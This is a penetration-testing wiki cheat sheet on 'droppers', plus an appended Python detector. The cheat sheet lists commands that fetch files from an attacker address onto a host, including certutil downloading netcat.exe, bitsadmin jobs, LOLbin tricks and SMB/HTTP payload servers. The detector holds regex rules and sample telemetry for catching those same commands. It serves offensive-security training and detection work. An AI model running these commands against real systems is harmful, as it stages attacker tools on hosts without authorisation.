Droppers
From pentestwiki.org
Classic methods
Linux
$ wget http://$IP/file
$ curl -k https://$IP/file > file
$ nc -nvv $IP 8080 > file
$ scp $FILE $USER@$IP:~
Windows
Powershell
PS> curl -Uri $URL -OutFile $FILE
(In Windows PowerShell 5.1, curl is an alias of Invoke-WebRequest; without -OutFile the response is only displayed, not written to disk. PowerShell 6+ dropped the alias, so there curl resolves to curl.exe and Invoke-WebRequest must be spelled out.)
See also Powercat
VBscript
ROBOCOPY
C:> NET USE \\$IP\IPC$ /USER:DOMAIN\USER
C:> ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
C:> NET USE \\$IP\IPC$ /D
BITSAdmin
https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool
- Direct transfer:
C:> bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE
- Using a download queue (the job stays suspended until /resume, and /complete moves the finished download into place):
C:> bitsadmin /create myDownloadJob
C:> bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE
C:> bitsadmin /resume myDownloadJob
C:> bitsadmin /complete myDownloadJob
Certutil
C:> certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe
Notepad
C:> notepad.exe http://$IP/file.txt
Living Off the Land (LOLbins) for Windows
Links:
- https://github.com/LOLBAS-Project/LOLBAS
- https://lolbas-project.github.io/
- https://gtfobins.github.io/
- https://github.com/Arno0x/CSharpScripts
- https://gist.github.com/jstangroome/9adaa87a845e5be906c8
- https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1
Examples:
C:> hh.exe C:\windows\system32\calc.exe
Built-in C# compiler:
C:> csc.exe
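The same fetch-and-run commands listed above are what a defender looks for in process-creation telemetry (image path plus command line, as Sysmon Event ID 1 records them). The following is an added example and not part of the pentestwiki page: a small Python classifier whose rules are derived from the tool invocations on this page, run over constructed sample records (the 192.0.2.10 address is a documentation address, not a real host).

```python
import re
from typing import Dict, Iterable, List, Tuple

# Rule name -> (regex on the image file name, regex on the arguments after the
# program token). Both must match. Patterns are derived from the invocations
# listed on this page; the image names are the real Windows binaries.
RULES: Dict[str, Tuple[str, str]] = {
    "certutil_urlcache_fetch": (r"^certutil(\.exe)?$", r"-urlcache\b.*\s-f\b.*https?://"),
    "bitsadmin_download_job": (r"^bitsadmin(\.exe)?$", r"/(transfer|addfile)\b.*https?://"),
    "powershell_web_fetch": (r"^(powershell|pwsh)(\.exe)?$",
                             r"\b(curl|iwr|wget|invoke-webrequest)\b.*\s-uri\b"),
    "notepad_remote_open": (r"^notepad(\.exe)?$", r"\bhttps?://"),
    "hh_exe_launch": (r"^hh(\.exe)?$", r"\.exe\b"),  # hh.exe normally opens .chm files, not .exe
    "net_use_ipc": (r"^net1?(\.exe)?$", r"\buse\b.*\\\\[^\\\s]+\\ipc\$"),
}

def split_args(cmdline: str) -> str:
    """Drop the first token (the program itself, possibly quoted) and return the arguments."""
    m = re.match(r'^\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.S)
    return m.group(1) if m else ""

def classify(image: str, cmdline: str) -> List[str]:
    """Return the names of all rules matching one process-creation record."""
    base = image.rsplit("\\", 1)[-1].lower()
    args = split_args(cmdline)
    return [name for name, (img_re, arg_re) in RULES.items()
            if re.search(img_re, base) and re.search(arg_re, args, re.I)]

def scan(events: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, command_line) for every record that trips a rule."""
    return [(rule, cmd) for image, cmd in events for rule in classify(image, cmd)]

# Constructed process-creation records (image, command line). The last two are
# benign controls that must not fire.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe",
     'certutil.exe -urlcache -split -f "https://192.0.2.10/files/netcat.exe" nc.exe'),
    (r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer myDownloadJob /download /priority normal http://192.0.2.10/file c:\file"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -c curl -Uri http://192.0.2.10/file -OutFile file"),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe http://192.0.2.10/file.txt"),
    (r"C:\Windows\hh.exe", r"hh.exe C:\windows\system32\calc.exe"),
    (r"C:\Windows\System32\net.exe", r"NET USE \\192.0.2.10\IPC$ /USER:DOMAIN\USER"),
    (r"C:\Windows\System32\certutil.exe", r"certutil.exe -hashfile C:\tools\setup.msi SHA256"),
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\alice\notes.txt"),
]

if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

Interactive cmdlets typed at a PS> prompt do not appear as a new process; for those, PowerShell script block logging (Event ID 4104) is the record to apply the powershell rule to.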
Using known protocols
HTTP
- Python2
$ python -m SimpleHTTPServer
root # python -m SimpleHTTPServer 80
- Python3
$ python3 -m http.server 8080
- PHP
$ php -S localhost:8000
- Ruby
$ ruby -run -e httpd . -p 8000
FTP
root # pip install pyftpdlib
root # python -m pyftpdlib
SMB
root # impacket-smbserver PAYLOADS /root/payload